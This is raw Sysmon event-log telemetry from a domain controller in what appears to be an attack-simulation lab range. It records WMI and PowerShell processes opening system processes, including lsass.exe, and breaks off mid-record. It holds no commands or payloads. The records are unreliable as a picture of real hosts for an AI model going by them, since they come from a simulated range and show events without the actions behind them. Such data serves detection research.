16:53:44.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002238685Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-6D98-603E-99AA-00000000AD01}11584ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_lcg2vq55.sji.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238684Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238683Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238682Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238681Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238680Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238679Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238678Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.475{05ADC7E1-6D98-603E-9CAA-00000000AD01}1305210092C:\Windows\system32\conhost.exe{05ADC7E1-6D98-603E-9BAA-00000000AD01}10560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238677Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238676Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238675Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238674Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238673Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238672Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238671Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238670Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238669Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.475{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-97AA-00000000AD01}13564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238668Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.475{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-97AA-00000000AD01}13564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238667Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.475{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-9CAA-00000000AD01}13052C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238666Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.475{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-9BAA-00000000AD01}10560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238665Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.475{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238664Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.475{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000002238663Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.475{05ADC7E1-6D98-603E-99AA-00000000AD01}11584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_lcg2vq55.sji.ps12021-03-02 16:53:44.475 10341000x80000000000000002238662Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.475{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238661Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 